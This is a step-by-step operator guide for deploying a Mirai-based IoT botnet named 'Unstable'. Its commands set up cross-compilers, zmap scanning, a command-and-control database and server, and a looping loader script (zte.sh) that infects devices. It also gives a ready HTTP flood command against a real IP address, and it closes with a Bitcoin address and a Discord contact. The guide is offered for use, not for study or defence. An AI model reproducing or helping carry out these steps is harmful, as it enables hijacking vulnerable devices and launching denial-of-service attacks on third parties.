//This is a completely viable botnet for the Internet of things, and there is no back door
------------------------------------------------------------------------------------------------------------------
yum update -y
yum install epel-release -y
yum groupinstall "Development Tools" -y
yum install gmp-devel -y
yum install apache2 -y
ln -s /usr/lib64/libgmp.so.3  /usr/lib64/libgmp.so.10
yum install screen wget bzip2 gcc nano gcc-c++ electric-fence sudo git libc6-dev httpd xinetd tftpd tftp-server mysql mysql-server gcc glibc-static -y
mkdir /etc/xcompile
------------------------------------------------------------------------------------------------------------------
//Move cross-compiler-armv7l.tar to the xcompile file
//Continue with the following command
------------------------------------------------------------------------------------------------------------------
cd /etc/xcompile 
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i586.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-m68k.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mips.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mipsel.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-powerpc.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sh4.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sparc.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv4l.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv5l.tar.bz2
wget http://distro.ibiblio.org/slitaz/sources/packages/c/cross-compiler-armv6l.tar.bz2


tar -jxf cross-compiler-i586.tar.bz2
tar -jxf cross-compiler-m68k.tar.bz2
tar -jxf cross-compiler-mips.tar.bz2
tar -jxf cross-compiler-mipsel.tar.bz2
tar -jxf cross-compiler-powerpc.tar.bz2
tar -jxf cross-compiler-sh4.tar.bz2
tar -jxf cross-compiler-sparc.tar.bz2
tar -jxf cross-compiler-armv4l.tar.bz2
tar -jxf cross-compiler-armv5l.tar.bz2
tar -jxf cross-compiler-armv6l.tar.bz2
tar -jxf cross-compiler-armv7l.tar.bz2

mv cross-compiler-i586 i586
mv cross-compiler-m68k m68k
mv cross-compiler-mips mips
mv cross-compiler-mipsel mipsel
mv cross-compiler-powerpc powerpc
mv cross-compiler-sh4 sh4
mv cross-compiler-sparc sparc
mv cross-compiler-armv4l armv4l
mv cross-compiler-armv5l armv5l
mv cross-compiler-armv6l armv6l
mv cross-compiler-armv7l armv7l

cd /tmp
wget https://dl.google.com/go/go1.13.6.linux-amd64.tar.gz -q
tar -xvf go1.13.6.linux-amd64.tar.gz
mv go /usr/local
export GOROOT=/usr/local/go
export GOPATH=$HOME/Projects/Proj1
export PATH=$GOPATH/bin:$GOROOT/bin:$PATH
go version
go env
cd ~/
go get github.com/go-sql-driver/mysql
go get github.com/mattn/go-shellwords

sudo yum install cmake gmp-devel gengetopt libpcap-devel flex byacc json-c-devel libunistring-devel -y
git clone https://github.com/zmap/zmap
cd /root/zmap/
cmake .
make -j4
make install

cd 

service mysqld restart
yum install -y mariadb-server
systemctl restart mariadb.service
mysql_secure_installation

------------------------------------------------------------------------------------------------------------------
//Enter the MySQL password

// Change all the ips into your botnet ip
 CHANGE IP(s)
------------------------------------------------------------------------------------------------------------------
bot/includes.h (line 24/25)
cnc/main.go (line 19)
dlr/main.c  (line 8)
loader/src/main.c  (line 33)
loader/src/headers/config.h (line 3/6)
 scanListen.go (line 14)

//Copy the file to the root directory

// Now Login with your mysql pass by running this command:
------------------------------------------------------------------------------------------------------------------
mysql -u root -p
------------------------------------------------------------------------------------------------------------------
//Now we will add the database, copy and paste it to your terminal (directly copy the following code and paste it)
Remember to change your password:
------------------------------------------------------------------------------------------------------------------

CREATE DATABASE Unstable;
use Unstable;
CREATE TABLE `history` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` int(10) unsigned NOT NULL,
  `time_sent` int(10) unsigned NOT NULL,
  `duration` int(10) unsigned NOT NULL,
  `command` text NOT NULL,
  `max_bots` int(11) DEFAULT '-1',
  PRIMARY KEY (`id`),
  KEY `user_id` (`user_id`)
);
 
CREATE TABLE `users` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `username` varchar(32) NOT NULL,
  `password` varchar(32) NOT NULL,
  `duration_limit` int(10) unsigned DEFAULT NULL,
  `cooldown` int(10) unsigned NOT NULL,
  `wrc` int(10) unsigned DEFAULT NULL,
  `last_paid` int(10) unsigned NOT NULL,
  `max_bots` int(11) DEFAULT '-1',
  `admin` int(10) unsigned DEFAULT '0',
  `intvl` int(10) unsigned DEFAULT '30',
  `api_key` text,
  PRIMARY KEY (`id`),
  KEY `username` (`username`)
);
 
CREATE TABLE `whitelist` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `prefix` varchar(16) DEFAULT NULL,
  `netmask` tinyint(3) unsigned DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `prefix` (`prefix`)
);

CREATE TABLE `history` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` int(10) unsigned NOT NULL,
  `time_sent` int(10) unsigned NOT NULL,
  `duration` int(10) unsigned NOT NULL,
  `command` text NOT NULL,
  `max_bots` int(11) DEFAULT '-1',
  PRIMARY KEY (`id`),
  KEY `user_id` (`user_id`)
);
 
CREATE TABLE `users` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `username` varchar(32) NOT NULL,
  `password` varchar(32) NOT NULL,
  `duration_limit` int(10) unsigned DEFAULT NULL,
  `cooldown` int(10) unsigned NOT NULL,
  `wrc` int(10) unsigned DEFAULT NULL,
  `last_paid` int(10) unsigned NOT NULL,
  `max_bots` int(11) DEFAULT '-1',
  `admin` int(10) unsigned DEFAULT '0',
  `intvl` int(10) unsigned DEFAULT '30',
  `api_key` text,
  PRIMARY KEY (`id`),
  KEY `username` (`username`)
);
 
CREATE TABLE `whitelist` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `prefix` varchar(16) DEFAULT NULL,
  `netmask` tinyint(3) unsigned DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `prefix` (`prefix`)
);

CREATE TABLE `logins` (
  `id` int(11) NOT NULL,
  `username` varchar(32) NOT NULL,
  `action` varchar(32) NOT NULL,
  `ip` varchar(15) NOT NULL,
  `timestamp` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP
) ENGINE=InnoDB DEFAULT CHARSET=latin1;


INSERT INTO users VALUES (NULL, 'root', 'yourpasswd', 0, 0, 0, 0, -1, 1, 30, '');
grant all privileges on *.* to 'root'@'%' with grant option;

Grant all privileges on *.* to 'root'@'%' identified by 'yourpasswd' with grant option;

use mysql
INSERT INTO users VALUES (NULL, 'root', 'yourpasswd', 0, 0, 0, 0, -1, 1, 30, '');
GRANT ALL ON *.* to root@'%' IDENTIFIED BY 'yourpasswd';
FLUSH PRIVILEGES;
SELECT User, Password, Host FROM user;


exit;

service mysqld restart
service iptables stop 
service httpd restart  
systemctl restart mariadb.service
------------------------------------------------------------------------------------------------------------------

// Alright, we have to compile the bot and screen the cnc server by doing this:

cd ~/
chmod 777 *
sh build.sh
------------------------------------------------------------------------------------------------------------------

nano /usr/include/bits/typesizes.h
scroll down and edit the 1024 to 999999
THEN SAVE IT 
ulimit -n999999; ulimit -u999999; ulimit -e999999

screen ./cnc
screen ./scanlisten
------------------------------------------------------------------------------------------------------------------

cd /root/loader
clear
chmod 777 * 
ulimit -n999999; ulimit -u999999; ulimit -e999999
sh zte.sh
------------------------------------------------------------------------------------------------------------------
zte.sh It's an automatic loop file. OK, now it's collecting IP
Make sure you have enough VPS bandwidth, CPU and memory

Now please open putty, and the connection port is 9375


Attack command:
.http ip 600 domain=46.221.62.59 conns=5000




This is a fully viable IOT botnet Please follow the installation file to execute the command The command applies to CentOS 7.5 64 bit If I solve your big problem, you can ask me to have a cup of coffee with you

“1NuuQDi5syR8GkKGYZUbGTbgCtef5uquLs” This is the bitcoin address

If you still don't understand, you can contact me My discord:xinwoteam1#2642

https://github.com/goodman-xh/Unstable-botnet-mirai
